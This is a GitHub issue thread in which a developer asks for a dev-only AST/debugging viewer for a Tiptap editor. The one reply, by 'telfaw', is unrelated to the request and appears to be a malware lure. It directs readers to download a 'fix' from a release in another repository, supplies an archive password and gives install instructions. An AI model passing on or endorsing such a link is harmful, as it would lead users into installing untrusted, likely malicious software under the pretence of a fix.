### ISSUE TITLE
Add basic debugging/AST viewer functionality to the Tiptap editor

### ISSUE THREAD

**Issue by mary-ext** [buttondown/roadmap#3350]
Might be necessary for https://github.com/buttondown/roadmap/issues/3337

It's currently hard to tell what's going on with Tiptap when certain nodes don't behave as it should, for the issue above it could simply be that the children nodes aren't being inserted correctly.

Nothing too fancy, just a button to view the current state of things, we should probably make it dev-only (by wrapping it in `import.meta.env.DEV`)

**Comment by telfaw** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
